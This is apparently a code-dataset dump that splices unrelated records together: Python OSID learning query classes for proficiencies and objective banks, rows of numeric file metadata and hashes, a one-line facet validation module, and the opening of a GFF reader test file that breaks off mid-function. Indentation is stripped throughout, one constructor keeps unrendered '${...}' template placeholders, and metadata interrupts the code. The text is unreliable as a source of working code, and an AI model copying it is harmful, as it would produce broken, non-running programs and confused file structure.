def get_course_query(self):
"""Gets the query for a course.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.course.CourseQuery) - the course query
raise: Unimplemented - ``supports_course_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_course_query()`` is ``true``.*
"""
raise errors.Unimplemented()
course_query = property(fget=get_course_query)
@utilities.arguments_not_none
def match_any_course(self, match):
"""Matches an activity that has any course assigned.
arg: match (boolean): ``true`` to match activities with any
courses, ``false`` to match activities with no courses
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_course_terms(self):
"""Clears the course terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
course_terms = property(fdel=clear_course_terms)
@utilities.arguments_not_none
def match_assessment_id(self, assessment_id, match):
"""Sets the assessment ``Id`` for this query.
arg: assessment_id (osid.id.Id): an assessment ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``assessment_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('assessmentId', str(assessment_id), match)
def clear_assessment_id_terms(self):
"""Clears the assessment ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('assessmentId')
assessment_id_terms = property(fdel=clear_assessment_id_terms)
def supports_assessment_query(self):
"""Tests if an ``AssessmentQuery`` is available for querying assessments.
return: (boolean) - ``true`` if an assessment query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_assessment_query(self):
"""Gets the query for a assessment.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.assessment.AssessmentQuery) - the assessment query
raise: Unimplemented - ``supports_assessment_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_assessment_query()`` is ``true``.*
"""
raise errors.Unimplemented()
assessment_query = property(fget=get_assessment_query)
@utilities.arguments_not_none
def match_any_assessment(self, match):
"""Matches an activity that has any assessment assigned.
arg: match (boolean): ``true`` to match activities with any
assessments, ``false`` to match activities with no
assessments
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_assessment_terms(self):
"""Clears the assessment terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
assessment_terms = property(fdel=clear_assessment_terms)
@utilities.arguments_not_none
def match_objective_bank_id(self, objective_bank_id, match):
"""Sets the objective bank ``Id`` for this query.
arg: objective_bank_id (osid.id.Id): an objective bank ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_bank_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedObjectiveBankIds', str(objective_bank_id), match)
def clear_objective_bank_id_terms(self):
"""Clears the objective bank ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedObjectiveBankIds')
objective_bank_id_terms = property(fdel=clear_objective_bank_id_terms)
def supports_objective_bank_query(self):
"""Tests if a ``ObjectiveBankQuery`` is available for querying resources.
return: (boolean) - ``true`` if an objective bank query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_objective_bank_query(self):
"""Gets the query for an objective bank.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveBankQuery) - the objective bank
query
raise: Unimplemented - ``supports_objective_bank_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_objective_bank_query()`` is ``true``.*
"""
raise errors.Unimplemented()
objective_bank_query = property(fget=get_objective_bank_query)
def clear_objective_bank_terms(self):
"""Clears the objective bank terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('objectiveBank')
objective_bank_terms = property(fdel=clear_objective_bank_terms)
@utilities.arguments_not_none
def get_activity_query_record(self, activity_record_type):
"""Gets the activity query record corresponding to the given ``Activity`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: activity_record_type (osid.type.Type): an activity query
record type
return: (osid.learning.records.ActivityQueryRecord) - the
activity query record
raise: NullArgument - ``activity_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported - ``has_record_type(activity_record_type)``
is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class ProficiencyQuery(abc_learning_queries.ProficiencyQuery, osid_queries.OsidRelationshipQuery):
"""This is the query for searching proficiencies.
Each method match specifies an ``AND`` term while multiple
invocations of the same method produce a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = '${pkg_name}.${object_name}'
self._runtime = runtime
record_type_data_sets = get_registry('${object_name_upper}_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_resource_id(self, resource_id, match):
"""Sets the resource ``Id`` for this query.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: match (boolean): ``true`` if a positive match, ``false``
for a negative match
raise: NullArgument - ``resource_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(resource_id, Id):
raise errors.InvalidArgument()
self._add_match('resourceId', str(resource_id), match)
def clear_resource_id_terms(self):
"""Clears the resource ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('resourceId')
resource_id_terms = property(fdel=clear_resource_id_terms)
def supports_resource_query(self):
"""Tests if a ``ResourceQuery`` is available.
return: (boolean) - ``true`` if a resource query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_resource_query(self):
"""Gets the query for a resource.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.resource.ResourceQuery) - the resource query
raise: Unimplemented - ``supports_resource_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_resource_query()`` is ``true``.*
"""
raise errors.Unimplemented()
resource_query = property(fget=get_resource_query)
def clear_resource_terms(self):
"""Clears the resource terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('resource')
resource_terms = property(fdel=clear_resource_terms)
@utilities.arguments_not_none
def match_objective_id(self, objective_id, match):
"""Sets the objective ``Id`` for this query.
arg: objective_id (osid.id.Id): an objective ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(objective_id, Id):
raise errors.InvalidArgument()
self._add_match('objectiveId', str(objective_id), match)
def clear_objective_id_terms(self):
"""Clears the objective ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('objectiveId')
objective_id_terms = property(fdel=clear_objective_id_terms)
def supports_objective_query(self):
"""Tests if an ``ObjectiveQuery`` is available for querying objectives.
return: (boolean) - ``true`` if an robjective query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_objective_query(self):
"""Gets the query for an objective.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveQuery) - the objective query
raise: Unimplemented - ``supports_objective_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_objective_query()`` is ``true``.*
"""
raise errors.Unimplemented()
objective_query = property(fget=get_objective_query)
@utilities.arguments_not_none
def match_any_objective(self, match):
"""Matches an activity that has any objective assigned.
arg: match (boolean): ``true`` to match activities with any
objective, ``false`` to match activities with no
objective
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_objective_terms(self):
"""Clears the objective terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('objective')
objective_terms = property(fdel=clear_objective_terms)
@utilities.arguments_not_none
def match_completion(self, start, end, match):
"""Sets the completion for this query to match completion percentages between the given range inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``end`` is less than ``start``
*compliance: mandatory -- This method must be implemented.*
"""
try:
start = float(start)
except ValueError:
raise errors.InvalidArgument('Invalid start value')
try:
end = float(end)
except ValueError:
raise errors.InvalidArgument('Invalid end value')
if match:
if end < start:
raise errors.InvalidArgument('end value must be >= start value when match = True')
self._query_terms['completion'] = {
'$gte': start,
'$lte': end
}
else:
raise errors.InvalidArgument('match = False not currently supported')
def clear_completion_terms(self):
"""Clears the completion terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('completion')
completion_terms = property(fdel=clear_completion_terms)
@utilities.arguments_not_none
def match_minimum_completion(self, completion, match):
"""Sets the minimum completion for this query.
arg: completion (decimal): completion percentage
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_completion_terms(self):
"""Clears the minimum completion terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_completion_terms = property(fdel=clear_minimum_completion_terms)
@utilities.arguments_not_none
def match_level_id(self, grade_id, match):
"""Sets the level grade ``Id`` for this query.
arg: grade_id (osid.id.Id): a grade ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
if not isinstance(grade_id, Id):
raise errors.InvalidArgument()
self._add_match('levelId', str(grade_id), match)
def clear_level_id_terms(self):
"""Clears all level ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('levelId')
level_id_terms = property(fdel=clear_level_id_terms)
def supports_level_query(self):
"""Tests if a ``GradeQuery`` is available.
return: (boolean) - ``true`` if a grade query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_level_query(self):
"""Gets the query for a grade.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeQuery) - the grade query
raise: Unimplemented - ``supports_level_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_level_query()`` is ``true``.*
"""
raise errors.Unimplemented()
level_query = property(fget=get_level_query)
@utilities.arguments_not_none
def match_any_level(self, match):
"""Matches an assessment offered that has any level assigned.
arg: match (boolean): ``true`` to match offerings with any
level, ``false`` to match offerings with no levsls
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_level_terms(self):
"""Clears all level terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('level')
level_terms = property(fdel=clear_level_terms)
@utilities.arguments_not_none
def match_objective_bank_id(self, objective_bank_id, match):
"""Sets the objective bank ``Id`` for this query.
arg: objective_bank_id (osid.id.Id): an objective bank ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_bank_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedObjectiveBankIds', str(objective_bank_id), match)
def clear_objective_bank_id_terms(self):
"""Clears the objective bank ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedObjectiveBankIds')
objective_bank_id_terms = property(fdel=clear_objective_bank_id_terms)
def supports_objective_bank_query(self):
"""Tests if a ``ObjectiveBankQuery`` is available for querying resources.
return: (boolean) - ``true`` if an objective bank query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_objective_bank_query(self):
"""Gets the query for an objective bank.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveBankQuery) - the objective bank
query
raise: Unimplemented - ``supports_objective_bank_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_objective_bank_query()`` is ``true``.*
"""
raise errors.Unimplemented()
objective_bank_query = property(fget=get_objective_bank_query)
def clear_objective_bank_terms(self):
"""Clears the objective bank terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('objectiveBank')
objective_bank_terms = property(fdel=clear_objective_bank_terms)
@utilities.arguments_not_none
def get_proficiency_query_record(self, proficiency_record_type):
"""Gets the proficiency query record corresponding to the given ``Proficiency`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: proficiency_record_type (osid.type.Type): a proficiency
offered record type
return: (osid.learning.records.ProficiencyQueryRecord) - the
proficiency offered query record
raise: NullArgument - ``proficiency_offered_record_type`` is
``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(proficiency_offered_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class ObjectiveBankQuery(abc_learning_queries.ObjectiveBankQuery, osid_queries.OsidCatalogQuery):
"""This is the query for searching objective banks.
Each method specifies an ``AND`` term while multiple invocations of
the same method produce a nested ``OR``.
"""
def __init__(self, runtime):
self._runtime = runtime
record_type_data_sets = get_registry('OBJECTIVEBANK_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidCatalogQuery.__init__(self, runtime)
def _get_descendant_catalog_ids(self, catalog_id):
hm = self._get_provider_manager('HIERARCHY')
hts = hm.get_hierarchy_traversal_session_for_hierarchy(
Id(authority='LEARNING',
namespace='CATALOG',
identifier='OBJECTIVEBANK')
) # What about the Proxy?
descendants = []
if hts.has_children(catalog_id):
for child_id in hts.get_children(catalog_id):
descendants += list(self._get_descendant_catalog_ids(child_id))
descendants.append(child_id)
return IdList(descendants)
@utilities.arguments_not_none
def match_objective_id(self, objective_id, match):
"""Sets the objective ``Id`` for this query.
arg: objective_id (osid.id.Id): an objective ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_objective_id_terms(self):
"""Clears the objective ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('objectiveId')
objective_id_terms = property(fdel=clear_objective_id_terms)
def supports_objective_query(self):
"""Tests if an ``ObjectiveQuery`` is available.
return: (boolean) - ``true`` if an objective query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_objective_query(self):
"""Gets the query for an objective.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveQuery) - the objective query
raise: Unimplemented - ``supports_objective_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_objective_query()`` is ``true``.*
"""
raise errors.Unimplemented()
objective_query = property(fget=get_objective_query)
@utilities.arguments_not_none
def match_any_objective(self, match):
"""Matches an objective bank that has any objective assigned.
arg: match (boolean): ``true`` to match objective banks with
any objective, ``false`` to match objective banks with
no objectives
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_objective_terms(self):
"""Clears the objective terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('objective')
objective_terms = property(fdel=clear_objective_terms)
@utilities.arguments_not_none
def match_activity_id(self, activity_id, match):
"""Sets the activity ``Id`` for this query.
arg: activity_id (osid.id.Id): an activity ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``activity_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_activity_id_terms(self):
"""Clears the activity ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('activityId')
activity_id_terms = property(fdel=clear_activity_id_terms)
def supports_activity_query(self):
"""Tests if a ``ActivityQuery`` is available for querying activities.
return: (boolean) - ``true`` if an activity query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_activity_query(self):
"""Gets the query for an activity.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ActivityQuery) - the activity query
raise: Unimplemented - ``supports_activity_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_activity_query()`` is ``true``.*
"""
raise errors.Unimplemented()
activity_query = property(fget=get_activity_query)
@utilities.arguments_not_none
def match_any_activity(self, match):
"""Matches an objective bank that has any activity assigned.
arg: match (boolean): ``true`` to match objective banks with
any activity, ``false`` to match objective banks with no
activities
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_activity_terms(self):
"""Clears the activity terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('activity')
activity_terms = property(fdel=clear_activity_terms)
@utilities.arguments_not_none
def match_ancestor_objective_bank_id(self, objective_bank_id, match):
"""Sets the objective bank ``Id`` for this query to match objective banks that have the specified objective bank as an ancestor.
arg: objective_bank_id (osid.id.Id): an objective bank ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_bank_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_ancestor_objective_bank_id_terms(self):
"""Clears the ancestor objective bank ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('ancestorObjectiveBankId')
ancestor_objective_bank_id_terms = property(fdel=clear_ancestor_objective_bank_id_terms)
def supports_ancestor_objective_bank_query(self):
"""Tests if a ``ObjectiveBankQuery`` is available for querying ancestor objective banks.
return: (boolean) - ``true`` if an objective bank query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_ancestor_objective_bank_query(self):
"""Gets the query for an objective bank.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveBankQuery) - the objective bank
query
raise: Unimplemented -
``supports_ancestor_objective_bank_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_ancestor_calndar_query()`` is ``true``.*
"""
raise errors.Unimplemented()
ancestor_objective_bank_query = property(fget=get_ancestor_objective_bank_query)
@utilities.arguments_not_none
def match_any_ancestor_objective_bank(self, match):
"""Matches an objective bank that has any ancestor.
arg: match (boolean): ``true`` to match objective banks with
any ancestor, ``false`` to match root objective banks
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_ancestor_objective_bank_terms(self):
"""Clears the ancestor objective bank terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('ancestorObjectiveBank')
ancestor_objective_bank_terms = property(fdel=clear_ancestor_objective_bank_terms)
@utilities.arguments_not_none
def match_descendant_objective_bank_id(self, objective_bank_id, match):
"""Sets the objective bank ``Id`` for this query to match objective banks that have the specified objective bank as a descendant.
arg: objective_bank_id (osid.id.Id): an objective bank ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_bank_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_descendant_objective_bank_id_terms(self):
"""Clears the descendant objective bank ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('descendantObjectiveBankId')
descendant_objective_bank_id_terms = property(fdel=clear_descendant_objective_bank_id_terms)
def supports_descendant_objective_bank_query(self):
"""Tests if a ``ObjectiveBankQuery`` is available for querying descendant objective banks.
return: (boolean) - ``true`` if an objective bank query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_descendant_objective_bank_query(self):
"""Gets the query for an objective bank.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveBankQuery) - the objective bank
query
raise: Unimplemented -
``supports_descendant_objective_bank_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_descendant_calndar_query()`` is ``true``.*
"""
raise errors.Unimplemented()
descendant_objective_bank_query = property(fget=get_descendant_objective_bank_query)
@utilities.arguments_not_none
def match_any_descendant_objective_bank(self, match):
"""Matches an objective bank that has any descendant.
arg: match (boolean): ``true`` to match objective banks with
any descendant, ``false`` to match leaf objective banks
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_descendant_objective_bank_terms(self):
"""Clears the descendant objective bank terms.
*compliance: mandatory -- This method must be implemented.*
"""
self._clear_terms('descendantObjectiveBank')
descendant_objective_bank_terms = property(fdel=clear_descendant_objective_bank_terms)
@utilities.arguments_not_none
def get_objective_bank_query_record(self, objective_bank_record_type):
"""Gets the objective bank query record corresponding to the given ``ObjectiveBank`` record ``Type``.
Multiple record retrievals produce a nested ``OR`` term.
arg: objective_bank_record_type (osid.type.Type): an
objective bank record type
return: (osid.learning.records.ObjectiveBankQueryRecord) - the
objective bank query record
raise: NullArgument - ``objective_bank_record_type`` is
``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(objective_bank_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
| 36.748797
| 137
| 0.656937
| 7,595
| 68,757
| 5.742989
| 0.035286
| 0.019533
| 0.045257
| 0.051722
| 0.87324
| 0.833853
| 0.778096
| 0.750676
| 0.725801
| 0.702233
| 0
| 0
| 0.248309
| 68,757
| 1,870
| 138
| 36.768449
| 0.843936
| 0.539843
| 0
| 0.567568
| 0
| 0
| 0.046799
| 0.017618
| 0
| 0
| 0
| 0
| 0
| 1
| 0.303534
| false
| 0
| 0.014553
| 0
| 0.476091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50a58443ccf49cdc106acc0f537a7f5cf6c32d78
| 192
|
py
|
Python
|
src/facet/validation/__init__.py
|
skandupmanyu/facet
|
545ade531ecfa617bad346ebef12955afa876cca
|
[
"Apache-2.0"
] | null | null | null |
src/facet/validation/__init__.py
|
skandupmanyu/facet
|
545ade531ecfa617bad346ebef12955afa876cca
|
[
"Apache-2.0"
] | null | null | null |
src/facet/validation/__init__.py
|
skandupmanyu/facet
|
545ade531ecfa617bad346ebef12955afa876cca
|
[
"Apache-2.0"
] | null | null | null |
"""
Bootstrap cross-validation including a stationary version for use with time series
data; used as the basis to generate confidence intervals for simulations.
"""
from ._validation import *
| 32
| 82
| 0.796875
| 26
| 192
| 5.846154
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 192
| 5
| 83
| 38.4
| 0.926829
| 0.8125
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ff51e7c0076afaf18ff11cab246ab5c37beb4e0
| 20,489
|
py
|
Python
|
test/gff_reader_tests.py
|
genomeannotation/GAG
|
997e384e1352d822efb2cb2931a99ec34069d82e
|
[
"MIT"
] | 48
|
2015-08-19T17:52:26.000Z
|
2022-03-29T10:07:03.000Z
|
test/gff_reader_tests.py
|
genomeannotation/GAG
|
997e384e1352d822efb2cb2931a99ec34069d82e
|
[
"MIT"
] | 45
|
2015-01-13T01:56:28.000Z
|
2021-07-01T19:42:16.000Z
|
test/gff_reader_tests.py
|
genomeannotation/GAG
|
997e384e1352d822efb2cb2931a99ec34069d82e
|
[
"MIT"
] | 15
|
2015-07-18T13:16:29.000Z
|
2022-03-14T06:23:20.000Z
|
#!/usr/bin/env python
# coding=utf-8
import io
import os
import unittest
from mock import Mock
from src.gff_reader import *
# noinspection PyPep8
def get_sample_text():
sample_text = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n"
sample_text += "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n"
sample_text += "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tgene\t145206\t183302\t.\t+\t.\tID=BDOR_007866\n"
sample_text += "scaffold00080\tmaker\tmRNA\t145206\t183302\t.\t+\t.\tID=BDOR_007866-RB;Parent=BDOR_007866\n"
sample_text += "scaffold00080\tmaker\texon\t145206\t145282\t0.065333\t+\t.\tID=BDOR_007866-RB:exon:5;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\texon\t145607\t145865\t47.919\t+\t.\tID=BDOR_007866-RB:exon:6;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\texon\t145928\t146176\t67.378\t+\t.\tID=BDOR_007866-RB:exon:7;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\tfive_prime_UTR\t145206\t145282\t.\t+\t.\tID=BDOR_007866-RB:UTR1;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\tfive_prime_UTR\t145607\t145865\t.\t+\t.\tID=BDOR_007866-RB:UTR2;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\tfive_prime_UTR\t145928\t146176\t.\t+\t.\tID=BDOR_007866-RB:UTR3;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\tfive_prime_UTR\t154498\t154575\t.\t+\t.\tID=BDOR_007866-RB:UTR4;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\tCDS\t154576\t154620\t.\t+\t0\tID=BDOR_007866-RB:cds:5;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\tCDS\t179210\t179419\t.\t+\t0\tID=BDOR_007866-RB:cds:6;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\tCDS\t179489\t179691\t.\t+\t0\tID=BDOR_007866-RB:cds:7;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\tthree_prime_UTR\t183025\t183302\t.\t+\t.\tID=BDOR_007866-RB:UTR5;Parent=BDOR_007866-RB\n"
sample_text += "scaffold00080\tmaker\tstop_codon\t183022\t183024\t.\t+\t.\tID=BDOR_007866-RB:stop2;Parent=BDOR_007866-RB\n"
return sample_text
# noinspection PyPep8
def get_out_of_order_text():
sample_text = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n"
sample_text += "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n"
sample_text += "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RB;Parent=BDOR_007864\n"
sample_text += "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n"
sample_text += "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RB\n"
sample_text += "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RB\n"
